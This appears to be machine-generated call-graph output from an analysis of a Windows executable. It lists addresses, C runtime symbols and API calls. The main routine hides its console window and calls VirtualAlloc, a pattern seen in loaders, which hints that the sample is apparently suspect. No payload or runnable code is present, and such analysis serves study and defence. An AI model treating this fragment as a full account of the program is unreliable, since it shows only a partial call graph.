40c799 11309->11313 11310 40c7ea 11312 407b6a __dosmaperr 14 API calls 11310->11312 11311->11310 11314 40c7c8 11311->11314 11315 40c7ef 11312->11315 11313->11298 11318 40c6e1 11314->11318 11317 406567 __fread_nolock 39 API calls 11315->11317 11317->11313 11319 40c6ed __FrameHandler3::FrameUnwindToState 11318->11319 11331 40a137 EnterCriticalSection 11319->11331 11321 40c6fc 11322 40a3b3 __wsopen_s 39 API calls 11321->11322 11329 40c741 11321->11329 11324 40c728 FlushFileBuffers 11322->11324 11323 407b6a __dosmaperr 14 API calls 11325 40c748 11323->11325 11324->11325 11326 40c734 GetLastError 11324->11326 11332 40c777 11325->11332 11327 407b57 __dosmaperr 14 API calls 11326->11327 11327->11329 11329->11323 11331->11321 11335 40a1ec LeaveCriticalSection 11332->11335 11334 40c760 11334->11313 11335->11334 11336->11306 11337->11289 11338->11258 11340 40e2c9 __fread_nolock 11339->11340 11348 40e191 11340->11348 11342 40e2d5 11343 4042bb __fread_nolock 39 API calls 11342->11343 11344 40e2e1 11343->11344 11344->11258 11398 409f86 LeaveCriticalSection 11345->11398 11347 40bb06 11347->11244 11349 40e19d __FrameHandler3::FrameUnwindToState 11348->11349 11350 40e1a7 11349->11350 11351 40e1ca 11349->11351 11352 4064ea __fread_nolock 39 API calls 11350->11352 11358 40e1c2 11351->11358 11359 4066e6 EnterCriticalSection 11351->11359 11352->11358 11354 40e1e8 11360 40e228 11354->11360 11356 40e1f5 11374 40e220 11356->11374 11358->11342 11359->11354 11361 40e235 11360->11361 11362 40e258 11360->11362 11363 4064ea __fread_nolock 39 API calls 11361->11363 11364 4083c6 ___scrt_uninitialize_crt 64 API calls 11362->11364 11371 40e250 11362->11371 11363->11371 11365 40e270 11364->11365 11366 40bb22 14 API calls 11365->11366 11367 40e278 11366->11367 11368 4065ab __fread_nolock 39 API calls 11367->11368 11369 40e284 11368->11369 11377 40e5fd 11369->11377 11371->11356 11373 408694 __freea 14 API calls 11373->11371 11397 4066fa LeaveCriticalSection 11374->11397 11376 40e226 11376->11358 11380 40e626 11377->11380 11383 40e28b 11377->11383 11378 40e675 11379 4064ea __fread_nolock 39 API calls 11378->11379 11379->11383 11380->11378 11381 40e64d 11380->11381 11384 40e56c 11381->11384 11383->11371 11383->11373 11385 40e578 __FrameHandler3::FrameUnwindToState 11384->11385 11392 40a137 EnterCriticalSection 11385->11392 11387 40e586 11388 40e5b7 11387->11388 11389 40e6d0 __wsopen_s 42 API calls 11387->11389 11393 40e5f1 11388->11393 11389->11388 11392->11387 11396 40a1ec LeaveCriticalSection 11393->11396 11395 40e5da 11395->11383 11396->11395 11397->11376 11398->11347 10013 40849d 10014 4084aa 10013->10014 10018 4084c2 10013->10018 10015 407b6a __dosmaperr 14 API calls 10014->10015 10016 4084af 10015->10016 10017 406567 __fread_nolock 39 API calls 10016->10017 10019 4084ba 10017->10019 10018->10019 10020 408521 10018->10020 10033 40d306 10018->10033 10022 4065ab __fread_nolock 39 API calls 10020->10022 10023 40853a 10022->10023 10038 407437 10023->10038 10026 4065ab __fread_nolock 39 API calls 10027 408573 10026->10027 10027->10019 10028 4065ab __fread_nolock 39 API calls 10027->10028 10029 408581 10028->10029 10029->10019 10030 4065ab __fread_nolock 39 API calls 10029->10030 10031 40858f 10030->10031 10032 4065ab __fread_nolock 39 API calls 10031->10032 10032->10019 10034 408637 __dosmaperr 14 API calls 10033->10034 10035 40d323 10034->10035 10036 408694 __freea 14 API calls 10035->10036 10037 40d32d 10036->10037 10037->10020 10039 407443 __FrameHandler3::FrameUnwindToState 10038->10039 10040 40744b 10039->10040 10044 407466 10039->10044 10041 407b57 __dosmaperr 14 API calls 10040->10041 10042 407450 10041->10042 10043 407b6a __dosmaperr 14 API calls 10042->10043 10067 407458 10043->10067 10045 40747d 10044->10045 10046 4074b8 10044->10046 10047 407b57 __dosmaperr 14 API calls 10045->10047 10048 4074c1 10046->10048 10049 4074d6 10046->10049 10050 407482 10047->10050 10051 407b57 __dosmaperr 14 API calls 10048->10051 10068 40a137 EnterCriticalSection 10049->10068 10053 407b6a __dosmaperr 14 API calls 10050->10053 10054 4074c6 10051->10054 10059 40748a 10053->10059 10056 407b6a __dosmaperr 14 API calls 10054->10056 10055 4074dc 10057 407510 10055->10057 10058 4074fb 10055->10058 10056->10059 10060 407550 __fread_nolock 51 API calls 10057->10060 10061 407b6a __dosmaperr 14 API calls 10058->10061 10062 406567 __fread_nolock 39 API calls 10059->10062 10063 40750b 10060->10063 10064 407500 10061->10064 10062->10067 10069 407548 10063->10069 10065 407b57 __dosmaperr 14 API calls 10064->10065 10065->10063 10067->10019 10067->10026 10068->10055 10072 40a1ec LeaveCriticalSection 10069->10072 10071 40754e 10071->10067 10072->10071 8378 4012a0 8379 4012ac __FrameHandler3::FrameUnwindToState 8378->8379 8404 4014a2 8379->8404 8381 4012b3 8382 40140c 8381->8382 8392 4012dd ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 8381->8392 8437 401796 IsProcessorFeaturePresent 8382->8437 8384 401413 8441 4059f2 8384->8441 8389 4012fc 8390 40137d 8415 405664 8390->8415 8392->8389 8392->8390 8430 4059cc 8392->8430 8394 401383 8419 401000 GetConsoleWindow ShowWindow 8394->8419 8405 4014ab 8404->8405 8447 401a05 IsProcessorFeaturePresent 8405->8447 8409 4014bc 8410 4014c0 8409->8410 8457 4060e1 8409->8457 8410->8381 8413 4014d7 8413->8381 8416 40566d 8415->8416 8418 405672 8415->8418 8773 4053be 8416->8773 8418->8394 9145 404813 8419->9145 8426 404b74 66 API calls 8427 401075 VirtualAlloc 8426->8427 9160 404d87 8427->9160 8431 406182 __FrameHandler3::FrameUnwindToState 8430->8431 8432 4059e2 __dosmaperr 8430->8432 8433 406c70 _unexpected 39 API calls 8431->8433 8432->8390 8434 406193 8433->8434 8435 40623e CallUnexpected 39 API calls 8434->8435 8436 4061bd 8435->8436 8438 4017ac __fread_nolock __CreateFrameInfo 8437->8438 8439 401857 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8438->8439 8440 4018a2 __CreateFrameInfo 8439->8440 8440->8384 9597 405826 8441->9597 8444 4059b6 8445 405826 __CreateFrameInfo 21 API calls 8444->8445 8446 401421 8445->8446 8448 4014b7 8447->8448 8449 401ebe 8448->8449 8466 4024f1 8449->8466 8453 401ecf 8454 401eda 8453->8454 8480 40252d 8453->8480 8454->8409 8456 401ec7 8456->8409 8520 40b0ca 8457->8520 8460 401edd 8461 401ef0 8460->8461 8462 401ee6 8460->8462 8461->8410 8463 4024d6 ___vcrt_uninitialize_ptd 6 API calls 8462->8463 8464 401eeb 8463->8464 8465 40252d ___vcrt_uninitialize_locks DeleteCriticalSection 8464->8465 8465->8461 8467 4024fa 8466->8467 8469 402523 8467->8469 8470 401ec3 8467->8470 8484 40276d 8467->8484 8471 40252d ___vcrt_uninitialize_locks DeleteCriticalSection 8469->8471 8470->8456 8472 4024a3 8470->8472 8471->8470 8501 40267e 8472->8501 8475 4024b8 8475->8453 8478 4024d3 8478->8453 8481 402557 8480->8481 8482 402538 8480->8482 8481->8456 8483 402542 DeleteCriticalSection 8482->8483 8483->8481 8483->8483 8489 402593 8484->8489 8487 4027a5 InitializeCriticalSectionAndSpinCount 8488 402790 8487->8488 8488->8467 8490 4025b0 8489->8490 8491 4025b4 8489->8491 8490->8487 8490->8488 8491->8490 8492 40261c GetProcAddress 8491->8492 8494 40260d 8491->8494 8496 402633 LoadLibraryExW 8491->8496 8492->8490 8494->8492 8495 402615 FreeLibrary 8494->8495 8495->8492 8497 40264a GetLastError 8496->8497 8498 40267a 8496->8498 8497->8498 8499 402655 ___vcrt_FlsFree 8497->8499 8498->8491 8499->8498 8500 40266b LoadLibraryExW 8499->8500 8500->8491 8502 402593 ___vcrt_FlsFree 5 API calls 8501->8502 8503 402698 8502->8503 8504 4026b1 TlsAlloc 8503->8504 8505 4024ad 8503->8505 8505->8475 8506 40272f 8505->8506 8507 402593 ___vcrt_FlsFree 5 API calls 8506->8507 8508 402749 8507->8508 8509 402764 TlsSetValue 8508->8509 8510 4024c6 8508->8510 8509->8510 8510->8478 8511 4024d6 8510->8511 8512 4024e0 8511->8512 8513 4024e6 8511->8513 8515 4026b9 8512->8515 8513->8475 8516 402593 ___vcrt_FlsFree 5 API calls 8515->8516 8517 4026d3 8516->8517 8518 4026eb TlsFree 8517->8518 8519 4026df 8517->8519 8518->8519 8519->8513 8521 40b0da 8520->8521 8522 4014c9 8520->8522 8521->8522 8525 407a41 8521->8525 8537 407991 8521->8537 8522->8413 8522->8460 8526 407a4d __FrameHandler3::FrameUnwindToState 8525->8526 8542 409f3e EnterCriticalSection 8526->8542 8528 407a54 8543 40a099 8528->8543 8531 407a72 8562 407a98 8531->8562 8536 407991 2 API calls 8536->8531 8538 407998 8537->8538 8539 4079db GetStdHandle 8538->8539 8540 407a3d 8538->8540 8541 4079ee GetFileType 8538->8541 8539->8538 8540->8521 8541->8538 8542->8528 8544 40a0a5 __FrameHandler3::FrameUnwindToState 8543->8544 8545 40a0ae 8544->8545 8546 40a0cf 8544->8546 8573 407b6a 8545->8573 8565 409f3e EnterCriticalSection 8546->8565 8551 407a63 8551->8531 8556 4078db GetStartupInfoW 8551->8556 8552 40a107 8579 40a12e 8552->8579 8553 40a0db 8553->8552 8566 409fe9 8553->8566 8557 4078f8 8556->8557 8558 40798c 8556->8558 8557->8558 8559 40a099 40 API calls 8557->8559 8558->8536 8560 407920 8559->8560 8560->8558 8561 407950 GetFileType 8560->8561 8561->8560 8772 409f86 LeaveCriticalSection 8562->8772 8564 407a83 8564->8521 8565->8553 8582 408637 8566->8582 8569 409ffb 8572 40a008 8569->8572 8589 40af1f 8569->8589 8594 408694 8572->8594 8627 406dc1 GetLastError 8573->8627 8575 407b6f 8576 406567 8575->8576 8691 4064b3 8576->8691 8771 409f86 LeaveCriticalSection 8579->8771 8581 40a135 8581->8551 8583 408644 __dosmaperr 8582->8583 8584 408684 8583->8584 8585 40866f RtlAllocateHeap 8583->8585 8600 40b172 8583->8600 8587 407b6a __dosmaperr 13 API calls 8584->8587 8585->8583 8586 408682 8585->8586 8586->8569 8587->8586 8613 40acdf 8589->8613 8591 40af3b 8592 40af59 InitializeCriticalSectionAndSpinCount 8591->8592 8593 40af44 8591->8593 8592->8593 8593->8569 8595 40869f HeapFree 8594->8595 8599 4086c9 8594->8599 8596 4086b4 GetLastError 8595->8596 8595->8599 8597 4086c1 __dosmaperr 8596->8597 8598 407b6a __dosmaperr 12 API calls 8597->8598 8598->8599 8599->8553 8603 40b19e 8600->8603 8604 40b1aa __FrameHandler3::FrameUnwindToState 8603->8604 8609 409f3e EnterCriticalSection 8604->8609 8606 40b1b5 __CreateFrameInfo 8610 40b1ec 8606->8610 8609->8606 8611 409f86 __CreateFrameInfo LeaveCriticalSection 8610->8611 8612 40b17d 8611->8612 8612->8583 8614 40ad0f 8613->8614 8618 40ad0b __dosmaperr 8613->8618 8614->8618 8619 40ac14 8614->8619 8617 40ad29 GetProcAddress 8617->8618 8618->8591 8625 40ac25 ___vcrt_FlsFree 8619->8625 8620 40acbb 8620->8617 8620->8618 8621 40ac43 LoadLibraryExW 8622 40acc2 8621->8622 8623 40ac5e GetLastError 8621->8623 8622->8620 8624 40acd4 FreeLibrary 8622->8624 8623->8625 8624->8620 8625->8620 8625->8621 8626 40ac91 LoadLibraryExW 8625->8626 8626->8622 8626->8625 8628 406ddd 8627->8628 8629 406dd7 8627->8629 8633 406de1 SetLastError 8628->8633 8655 40aedd 8628->8655 8650 40ae9e 8629->8650 8633->8575 8635 408637 __dosmaperr 12 API calls 8636 406e0e 8635->8636 8637 406e16 8636->8637 8638 406e27 8636->8638 8639 40aedd __dosmaperr 6 API calls 8637->8639 8640 40aedd __dosmaperr 6 API calls 8638->8640 8641 406e24 8639->8641 8642 406e33 8640->8642 8646 408694 __freea 12 API calls 8641->8646 8643 406e37 8642->8643 8644 406e4e 8642->8644 8645 40aedd __dosmaperr 6 API calls 8643->8645 8660 406a9e 8644->8660 8645->8641 8646->8633 8649 408694 __freea 12 API calls 8649->8633 8651 40acdf __dosmaperr 5 API calls 8650->8651 8652 40aeba 8651->8652 8653 40aed5 TlsGetValue 8652->8653 8654 40aec3 8652->8654 8654->8628 8656 40acdf __dosmaperr 5 API calls 8655->8656 8657 40aef9 8656->8657 8658 406df9 8657->8658 8659 40af17 TlsSetValue 8657->8659 8658->8633 8658->8635 8665 406932 8660->8665 8666 40693e __FrameHandler3::FrameUnwindToState 8665->8666 8679 409f3e EnterCriticalSection 8666->8679 8668 406948 8680 406978 8668->8680 8671 406a44 8672 406a50 __FrameHandler3::FrameUnwindToState 8671->8672 8683 409f3e EnterCriticalSection 8672->8683 8674 406a5a 8684 406c25 8674->8684 8676 406a72 8688 406a92 8676->8688 8679->8668 8681 409f86 __CreateFrameInfo LeaveCriticalSection 8680->8681 8682 406966 8681->8682 8682->8671 8683->8674 8685 406c34 __dosmaperr 8684->8685 8687 406c5b __dosmaperr 8684->8687 8686 40a88f __dosmaperr 14 API calls 8685->8686 8685->8687 8686->8687 8687->8676 8689 409f86 __CreateFrameInfo LeaveCriticalSection 8688->8689 8690 406a80 8689->8690 8690->8649 8692 4064c5 __fread_nolock 8691->8692 8697 4064ea 8692->8697 8694 4064dd 8708 4042bb 8694->8708 8698 406501 8697->8698 8699 4064fa 8697->8699 8704 40650f 8698->8704 8718 406342 8698->8718 8714 4046be GetLastError 8699->8714 8702 406536 8702->8704 8721 406577 IsProcessorFeaturePresent 8702->8721 8704->8694 8705 406566 8706 4064b3 __fread_nolock 39 API calls 8705->8706 8707 406573 8706->8707 8707->8694 8709 4042c7 8708->8709 8711 4042de 8709->8711 8753 404704 8709->8753 8712 404704 __fread_nolock 39 API calls 8711->8712 8713 4042f1 8711->8713 8712->8713 8713->8551 8715 4046d7 8714->8715 8725 406e72 8715->8725 8719 406366 8718->8719 8720 40634d GetLastError SetLastError 8718->8720 8719->8702 8720->8702 8722 406583 8721->8722 8747 40636b 8722->8747 8726 406e85 8725->8726 8727 406e8b 8725->8727 8729 40ae9e __dosmaperr 6 API calls 8726->8729 8728 40aedd __dosmaperr 6 API calls 8727->8728 8746 4046ef SetLastError 8727->8746 8730 406ea5 8728->8730 8729->8727 8731 408637 __dosmaperr 14 API calls 8730->8731 8730->8746 8732 406eb5 8731->8732 8733 406ed2 8732->8733 8734 406ebd 8732->8734 8735 40aedd __dosmaperr 6 API calls 8733->8735 8736 40aedd __dosmaperr 6 API calls 8734->8736 8737 406ede 8735->8737 8738 406ec9 8736->8738 8739 406ef1 8737->8739 8740 406ee2 8737->8740 8743 408694 __freea 14 API calls 8738->8743 8742 406a9e __dosmaperr 14 API calls 8739->8742 8741 40aedd __dosmaperr 6 API calls 8740->8741 8741->8738 8744 406efc 8742->8744 8743->8746 8745 408694 __freea 14 API calls 8744->8745 8745->8746 8746->8698 8748 406387 __fread_nolock __CreateFrameInfo 8747->8748 8749 4063b3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8748->8749 8752 406484 __CreateFrameInfo 8749->8752 8750 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 8751 4064a2 GetCurrentProcess TerminateProcess 8750->8751 8751->8705 8752->8750 8754 404717 8753->8754 8755 40470e 8753->8755 8754->8711 8756 4046be __fread_nolock 16 API calls 8755->8756 8757 404713 8756->8757 8757->8754 8760 40623e 8757->8760 8761 40b2c7 __CreateFrameInfo EnterCriticalSection LeaveCriticalSection 8760->8761 8762 406243 8761->8762 8763 40b30c __CreateFrameInfo 38 API calls 8762->8763 8765 40624e 8762->8765 8763->8765 8764 406258 IsProcessorFeaturePresent 8766 406264 8764->8766 8765->8764 8770 406277 8765->8770 8768 40636b __CreateFrameInfo 8 API calls 8766->8768 8767 4059b6 __CreateFrameInfo 21 API calls 8769 406281 8767->8769 8768->8770 8770->8767 8771->8581 8772->8564 8774 4053c7 8773->8774 8777 4053dd 8773->8777 8774->8777 8779 4053ea 8774->8779 8776 4053d4 8776->8777 8796 405555 8776->8796 8777->8418 8780 4053f3 8779->8780 8781 4053f6 8779->8781 8780->8776 8804 409616 8781->8804 8786 405413 8831 405444 8786->8831 8787 405407 8789 408694 __freea 14 API calls 8787->8789 8791 40540d 8789->8791 8791->8776 8792 408694 __freea 14 API calls 8793 405437 8792->8793 8794 408694 __freea 14 API calls 8793->8794 8795 40543d 8794->8795 8795->8776 8797 4055c6 8796->8797 8802 405564 8796->8802 8797->8777 8798 409a30 WideCharToMultiByte __wsopen_s 8798->8802 8799 408637 __dosmaperr 14 API calls 8799->8802 8800 4055ca 8801 408694 __freea 14 API calls 8800->8801 8801->8797 8802->8797 8802->8798 8802->8799 8802->8800 8803 408694 __freea 14 API calls 8802->8803 8803->8802 8805 4053fc 8804->8805 8806 40961f 8804->8806 8810 409ad3 GetEnvironmentStringsW 8805->8810 8853 406d2b 8806->8853 8811 405401 8810->8811 8812 409aeb 8810->8812 8811->8786 8811->8787 8813 409a30 __wsopen_s WideCharToMultiByte 8812->8813 8814 409b08 8813->8814 8815 409b12 FreeEnvironmentStringsW 8814->8815 8816 409b1d 8814->8816 8815->8811 8817 40a6a3 __fread_nolock 15 API calls 8816->8817 8818 409b24 8817->8818 8819 409b2c 8818->8819 8820 409b3d 8818->8820 8821 408694 __freea 14 API calls 8819->8821 8822 409a30 __wsopen_s WideCharToMultiByte 8820->8822 8823 409b31 FreeEnvironmentStringsW 8821->8823 8824 409b4d 8822->8824 8823->8811 8825 409b54 8824->8825 8826 409b5c 8824->8826 8828 408694 __freea 14 API calls 8825->8828 8827 408694 __freea 14 API calls 8826->8827 8829 409b5a FreeEnvironmentStringsW 8827->8829 8828->8829 8829->8811 8832 405459 8831->8832 8833 408637 __dosmaperr 14 API calls 8832->8833 8834 405480 8833->8834 8835 405488 8834->8835 8845 405492 8834->8845 8836 408694 __freea 14 API calls 8835->8836 8837 40541a 8836->8837 8837->8792 8838 4054ef 8839 408694 __freea 14 API calls 8838->8839 8839->8837 8840 408637 __dosmaperr 14 API calls 8840->8845 8841 4054fe 9139 405526 8841->9139 8845->8838 8845->8840 8845->8841 8847 405519 8845->8847 8850 408694 __freea 14 API calls 8845->8850 9130 4061e4 8845->9130 8846 408694 __freea 14 API calls 8849 40550b 8846->8849 8848 406577 __fread_nolock 11 API calls 8847->8848 8851 405525 8848->8851 8852 408694 __freea 14 API calls 8849->8852 8850->8845 8852->8837 8854 406d36 8853->8854 8858 406d3c 8853->8858 8856 40ae9e __dosmaperr 6 API calls 8854->8856 8855 40aedd __dosmaperr 6 API calls 8857 406d56 8855->8857 8856->8858 8859 406d42 8857->8859 8860 408637 __dosmaperr 14 API calls 8857->8860 8858->8855 8858->8859 8861 40623e CallUnexpected 39 API calls 8859->8861 8862 406d47 8859->8862 8863 406d66 8860->8863 8864 406dc0 8861->8864 8878 409421 8862->8878 8865 406d83 8863->8865 8866 406d6e 8863->8866 8868 40aedd __dosmaperr 6 API calls 8865->8868 8867 40aedd __dosmaperr 6 API calls 8866->8867 8869 406d7a 8867->8869 8870 406d8f 8868->8870 8875 408694 __freea 14 API calls 8869->8875 8871 406da2 8870->8871 8872 406d93 8870->8872 8874 406a9e __dosmaperr 14 API calls 8871->8874 8873 40aedd __dosmaperr 6 API calls 8872->8873 8873->8869 8876 406dad 8874->8876 8875->8859 8877 408694 __freea 14 API calls 8876->8877 8877->8862 8901 409576 8878->8901 8885 40948b 8926 409671 8885->8926 8886 40947d 8887 408694 __freea 14 API calls 8886->8887 8889 409464 8887->8889 8889->8805 8891 4094c3 8892 407b6a __dosmaperr 14 API calls 8891->8892 8893 4094c8 8892->8893 8895 408694 __freea 14 API calls 8893->8895 8894 40950a 8897 409553 8894->8897 8937 40909a 8894->8937 8895->8889 8896 4094de 8896->8894 8899 408694 __freea 14 API calls 8896->8899 8898 408694 __freea 14 API calls 8897->8898 8898->8889 8899->8894 8902 409582 __FrameHandler3::FrameUnwindToState 8901->8902 8910 40959c 8902->8910 8945 409f3e EnterCriticalSection 8902->8945 8904 40623e CallUnexpected 39 API calls 8909 409615 8904->8909 8905 40944b 8912 4091a8 8905->8912 8906 4095ac 8907 4095d8 8906->8907 8911 408694 __freea 14 API calls 8906->8911 8946 4095f5 8907->8946 8910->8904 8910->8905 8911->8907 8950 4080af 8912->8950 8915 4091c9 GetOEMCP 8917 4091f2 8915->8917 8916 4091db 8916->8917 8918 4091e0 GetACP 8916->8918 8917->8889 8919 40a6a3 8917->8919 8918->8917 8920 40a6e1 8919->8920 8925 40a6b1 __dosmaperr 8919->8925 8921 407b6a __dosmaperr 14 API calls 8920->8921 8923 409475 8921->8923 8922 40a6cc RtlAllocateHeap 8922->8923 8922->8925 8923->8885 8923->8886 8924 40b172 __dosmaperr 2 API calls 8924->8925 8925->8920 8925->8922 8925->8924 8927 4091a8 41 API calls 8926->8927 8929 409691 8927->8929 8928 409796 9030 401be5 8928->9030 8929->8928 8931 4096ce IsValidCodePage 8929->8931 8936 4096e9 __fread_nolock 8929->8936 8931->8928 8933 4096e0 8931->8933 8932 4094b8 8932->8891 8932->8896 8934 409709 GetCPInfo 8933->8934 8933->8936 8934->8928 8934->8936 9019 40927c 8936->9019 8938 4090a6 __FrameHandler3::FrameUnwindToState 8937->8938 9104 409f3e EnterCriticalSection 8938->9104 8940 4090b0 9105 4090e7 8940->9105 8945->8906 8949 409f86 LeaveCriticalSection 8946->8949 8948 4095fc 8948->8910 8949->8948 8951 4080c6 8950->8951 8952 4080cd 8950->8952 8951->8915 8951->8916 8952->8951 8958 406c70 GetLastError 8952->8958 8959 406c8c 8958->8959 8960 406c86 8958->8960 8962 40aedd __dosmaperr 6 API calls 8959->8962 8964 406c90 SetLastError 8959->8964 8961 40ae9e __dosmaperr 6 API calls 8960->8961 8961->8959 8963 406ca8 8962->8963 8963->8964 8966 408637 __dosmaperr 14 API calls 8963->8966 8968 406d20 8964->8968 8969 406d25 8964->8969 8967 406cbd 8966->8967 8971 406cc5 8967->8971 8972 406cd6 8967->8972 8985 408131 8968->8985 8970 40623e CallUnexpected 37 API calls 8969->8970 8974 406d2a 8970->8974 8975 40aedd __dosmaperr 6 API calls 8971->8975 8973 40aedd __dosmaperr 6 API calls 8972->8973 8976 406ce2 8973->8976 8977 406cd3 8975->8977 8978 406ce6 8976->8978 8979 406cfd 8976->8979 8981 408694 __freea 14 API calls 8977->8981 8980 40aedd __dosmaperr 6 API calls 8978->8980 8982 406a9e __dosmaperr 14 API calls 8979->8982 8980->8977 8981->8964 8983 406d08 8982->8983 8984 408694 __freea 14 API calls 8983->8984 8984->8964 8986 408144 8985->8986 8987 408104 8985->8987 8986->8987 8993 40aadb 8986->8993 8989 40818f 8987->8989 8990 4081a2 8989->8990 8991 4081b7 8989->8991 8990->8991 9014 40965e 8990->9014 8991->8951 8994 40aae7 __FrameHandler3::FrameUnwindToState 8993->8994 8995 406c70 _unexpected 39 API calls 8994->8995 8996 40aaf0 8995->8996 8997 40ab36 8996->8997 9006 409f3e EnterCriticalSection 8996->9006 8997->8987 8999 40ab0e 9007 40ab5c 8999->9007 9004 40623e CallUnexpected 39 API calls 9005 40ab5b 9004->9005 9006->8999 9008 40ab1f 9007->9008 9009 40ab6a __dosmaperr 9007->9009 9011 40ab3b 9008->9011 9009->9008 9010 40a88f __dosmaperr 14 API calls 9009->9010 9010->9008 9012 409f86 __CreateFrameInfo LeaveCriticalSection 9011->9012 9013 40ab32 9012->9013 9013->8997 9013->9004 9015 406c70 _unexpected 39 API calls 9014->9015 9016 409663 9015->9016 9017 409576 __wsopen_s 39 API calls 9016->9017 9018 40966e 9017->9018 9018->8991 9020 4092a4 GetCPInfo 9019->9020 9021 40936d 9019->9021 9020->9021 9027 4092bc 9020->9027 9023 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9021->9023 9025 40941f 9023->9025 9025->8928 9037 40a6f1 9027->9037 9029 40dbf3 43 API calls 9029->9021 9031 401bed 9030->9031 9032 401bee IsProcessorFeaturePresent 9030->9032 9031->8932 9034 401c30 9032->9034 9103 401bf3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9034->9103 9036 401d13 9036->8932 9038 4080af __wsopen_s 39 API calls 9037->9038 9039 40a711 9038->9039 9057 409976 9039->9057 9041 40a7cd 9044 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9041->9044 9042 40a7c5 9060 40a7f2 9042->9060 9043 40a73e 9043->9041 9043->9042 9047 40a6a3 __fread_nolock 15 API calls 9043->9047 9048 40a763 __fread_nolock __alloca_probe_16 9043->9048 9045 409324 9044->9045 9052 40dbf3 9045->9052 9047->9048 9048->9042 9049 409976 __fread_nolock MultiByteToWideChar 9048->9049 9050 40a7ac 9049->9050 9050->9042 9051 40a7b3 GetStringTypeW 9050->9051 9051->9042 9053 4080af __wsopen_s 39 API calls 9052->9053 9054 40dc06 9053->9054 9066 40da04 9054->9066 9064 4098de 9057->9064 9061 40a7fe 9060->9061 9063 40a80f 9060->9063 9062 408694 __freea 14 API calls 9061->9062 9061->9063 9062->9063 9063->9041 9065 4098ef MultiByteToWideChar 9064->9065 9065->9043 9067 40da1f 9066->9067 9068 409976 __fread_nolock MultiByteToWideChar 9067->9068 9072 40da63 9068->9072 9069 40dbde 9070 401be5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 9069->9070 9071 409345 9070->9071 9071->9029 9072->9069 9073 40a6a3 __fread_nolock 15 API calls 9072->9073 9075 40da89 __alloca_probe_16 9072->9075 9086 40db31 9072->9086 9073->9075 9074 40a7f2 __freea 14 API calls 9074->9069 9076 409976 __fread_nolock MultiByteToWideChar 9075->9076 9075->9086 9077 40dad2 9076->9077 9077->9086 9094 40af6a 9077->9094 9080 40db40 9082 40dbc9 9080->9082 9084 40a6a3 __fread_nolock 15 API calls 9080->9084 9087 40db52 __alloca_probe_16 9080->9087 9081 40db08 9083 40af6a 6 API calls 9081->9083 9081->9086 9085 40a7f2 __freea 14 API calls 9082->9085 9083->9086 9084->9087 9085->9086 9086->9074 9087->9082 9088 40af6a 6 API calls 9087->9088 9089 40db95 9088->9089 9089->9082 9100 409a30 9089->9100 9091 40dbaf 9091->9082 9092 40dbb8 9091->9092 9093 40a7f2 __freea 14 API calls 9092->9093 9093->9086 9095 40abe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9094->9095 9096 40af75 9095->9096 9097 40afc7 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9096->9097 9099 40af7b 9096->9099 9098 40afbb LCMapStringW 9097->9098 9098->9099 9099->9080 9099->9081 9099->9086 9101 409a43 __wsopen_s 9100->9101 9102 409a81 WideCharToMultiByte 9101->9102 9102->9091 9103->9036 9104->8940 9115 404e41 9105->9115 9107 409109 9108 404e41 __fread_nolock 39 API calls 9107->9108 9109 409128 9108->9109 9110 4090bd 9109->9110 9111 408694 __freea 14 API calls 9109->9111 9112 4090db 9110->9112 9111->9110 9129 409f86 LeaveCriticalSection 9112->9129 9114 4090c9 9114->8897 9116 404e52 9115->9116 9120 404e4e __fread_nolock 9115->9120 9117 404e59 9116->9117 9121 404e6c __fread_nolock 9116->9121 9118 407b6a __dosmaperr 14 API calls 9117->9118 9119 404e5e 9118->9119 9122 406567 __fread_nolock 39 API calls 9119->9122 9120->9107 9121->9120 9123 404ea3 9121->9123 9124 404e9a 9121->9124 9122->9120 9123->9120 9127 407b6a __dosmaperr 14 API calls 9123->9127 9125 407b6a __dosmaperr 14 API calls 9124->9125 9126 404e9f 9125->9126 9128 406567 __fread_nolock 39 API calls 9126->9128 9127->9126 9128->9120 9129->9114 9131 4061f2 9130->9131 9132 406200 9130->9132 9131->9132 9137 406218 9131->9137 9133 407b6a __dosmaperr 14 API calls 9132->9133 9134 406208 9133->9134 9136 406567 __fread_nolock 39 API calls 9134->9136 9135 406212 9135->8845 9136->9135 9137->9135 9138 407b6a __dosmaperr 14 API calls 9137->9138 9138->9134 9140 405504 9139->9140 9141 405533 9139->9141 9140->8846 9142 40554a 9141->9142 9143 408694 __freea 14 API calls 9141->9143 9144 408694 __freea 14 API calls 9142->9144 9143->9141 9144->9140 9163 40475c 9145->9163 9148 404b74 9149 404b87 __fread_nolock 9148->9149 9214 404905 9149->9214 9152 4042bb __fread_nolock 39 API calls 9153 401056 9152->9153 9154 40472c 9153->9154 9155 40473f __fread_nolock 9154->9155 9400 404020 9155->9400 9158 4042bb __fread_nolock 39 API calls 9159 401062 9158->9159 9159->8426 9471 404da4 9160->9471 9164 404768 __FrameHandler3::FrameUnwindToState 9163->9164 9165 40476f 9164->9165 9167 40478f 9164->9167 9166 407b6a __dosmaperr 14 API calls 9165->9166 9168 404774 9166->9168 9169 4047a1 9167->9169 9170 404794 9167->9170 9171 406567 __fread_nolock 39 API calls 9168->9171 9180 407b7d 9169->9180 9172 407b6a __dosmaperr 14 API calls 9170->9172 9174 401043 9171->9174 9172->9174 9174->9148 9176 4047b1 9178 407b6a __dosmaperr 14 API calls 9176->9178 9177 4047be 9188 4047fc 9177->9188 9178->9174 9181 407b89 __FrameHandler3::FrameUnwindToState 9180->9181 9192 409f3e EnterCriticalSection 9181->9192 9183 407b97 9193 407c21 9183->9193 9189 404800 9188->9189 9213 4066fa LeaveCriticalSection 9189->9213 9191 404811 9191->9174 9192->9183 9201 407c44 9193->9201 9194 407ba4 9206 407bdd 9194->9206 9195 407c9c 9196 408637 __dosmaperr 14 API calls 9195->9196 9197 407ca5 9196->9197 9199 408694 __freea 14 API calls 9197->9199 9200 407cae 